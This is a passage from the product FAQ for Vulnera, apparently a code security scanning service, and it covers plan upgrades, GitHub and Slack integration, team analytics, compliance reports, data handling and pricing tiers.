| Generated in | Settings → API Keys | Organization → Settings → API Keys |

Best practice: Use organization keys for CI/CD pipelines; personal keys for local testing.

How do I upgrade my organization’s plan?

Upgrade plan:

  1. Go to vulnera.studioSettings → Billing
  2. Current plan and quota displayed
  3. Click Change Plan or Upgrade
  4. Select new tier (Pro, Enterprise) or add custom tokens
  5. Update payment method if needed
  6. Click Confirm Upgrade

Plan options:

  • Free — 48 tokens/day, 5 members, basic integrations
  • Pro — 1000 tokens/month, unlimited members, advanced integrations
  • Enterprise — Custom tokens, SSO/SAML, custom domains, priority support

Downgrade: Available mid-cycle; changes take effect at next billing date.

Reference: Quota & Pricing

How do I connect GitHub for automatic scanning?

GitHub Integration setup:

  1. Go to vulnera.studioSettings → Integrations → GitHub
  2. Click Connect GitHub
  3. Authorize Vulnera GitHub App (select repos or all repos)
  4. Enable auto-scan triggers:
    • On push to main/develop
    • On all pull requests
    • Scheduled daily scan
  5. Save — scans now run automatically

What happens:

  • PRs show Vulnera status checks
  • Comments added to PRs with findings
  • Merge blocked if critical issues found (configurable)
  • Results uploaded to GitHub code scanning

Reference: Dashboard Guide - GitHub Integration

How do I set up Slack notifications?

Enable Slack integration:

  1. Go to vulnera.studioSettings → Integrations → Slack
  2. Click Connect Slack Workspace
  3. Authorize Vulnera app in Slack
  4. Select notification channel
  5. Configure notification types:
    • Critical findings (immediate)
    • Daily digest
    • Weekly summary
    • Quota alerts
  6. Save

Example Slack message:

🚨 Critical Vulnerability Found
Repo: acme/backend
Finding: SQL Injection in /api/users.py
CVSS: 9.2
→ View Details [Link]

Reference: Dashboard Guide - Slack Integration

How do I view team analytics and usage?

Organization Analytics:

  1. Go to vulnera.studioOrganization → Analytics
  2. View dashboard:
    • Total quota used vs. remaining
    • Per-member breakdown (token consumption)
    • Module usage (pie chart: Dependencies, SAST, Secrets, API)
    • 6-month usage trend
    • Top analyzed projects

Export report:

  1. Click Export
  2. Choose format: CSV, JSON, or PDF
  3. Download for spreadsheets or stakeholder reporting

Reference: Dashboard Guide - Quota Management

Can I generate compliance reports from the dashboard?

Yes, multiple report types:

  1. Go to vulnera.studioReports → Compliance Reports
  2. Select framework:
    • SOC2 Type II
    • ISO 27001
    • GDPR
    • HIPAA (Enterprise)
    • PCI DSS (Enterprise)
  3. Select date range
  4. Click Generate → PDF/HTML download
  5. Share with auditors or stakeholders

Report contents:

  • Security metrics summary
  • Audit log excerpts
  • Member access records
  • Vulnerability remediation status
  • Data handling compliance statements

Reference: Dashboard Guide - Reporting & Export

How do I remove a team member?

Remove member from organization:

  1. Go to vulnera.studioSettings → Members
  2. Find member in list
  3. Click Remove (⋯ menu)
  4. Confirm removal — member loses access immediately

What happens:

  • Member can no longer see organization scans
  • Their scans remain in history (for audit)
  • Their API keys are revoked
  • Activity logged in audit trail

Reinvite later: Can re-invite removed members anytime

Reference: Organization Management - Removing Members


Security & Privacy

Is my code scanned securely?

Data handling:

| Data | Storage | Retention |
|---|---|---|
| Code artifacts | Encrypted in transit, encrypted at rest | 30 days (deleted) |
| Findings | Database (encrypted) | Until you delete |
| API keys | Hashed in database | Until revoked |
| User data | GDPR compliant | Until account deletion |

Reference: Architecture - Security Model

Can I see Vulnera’s source code?

Partial:

  • Open-source: SAST rules, Secrets patterns, CLI utilities
  • Proprietary: LLM integration, API backend, rate limiting logic
  • Reference: GitHub open-source modules

Is on-premise deployment available?

Yes. Vulnera supports self-hosted deployment: the server ships as a single Rust binary backed by PostgreSQL and optional Dragonfly/Redis, deployable via Docker or Kubernetes.

Contact Vulnera for enterprise licenses.


Cost & Licensing

Is there a free tier?

Yes:

| Tier | Features | Cost |
|---|---|---|
| Community | SAST, Secrets, API (offline) | Free |
| Developer | + Dependency scanning, LLM (limited, 40 tokens/day) | Free / API key |
| Organization | Team collaboration, 100 tokens/day, analytics | $99/month |
| Enterprise | Unlimited, SLA | Custom |

Reference: Quota & Pricing

What if I exceed my quota?

Billing options:

  1. Auto-upgrade — Automatically upgrade org to higher tier at month-end
  2. Per-use billing — Pay $0.10/token over quota (prepay)
  3. Reserved quota — Pre-purchase token packages at 20% discount

Set preferences in Settings → Billing.


Getting Help

Resources:

For bugs: GitHub Issues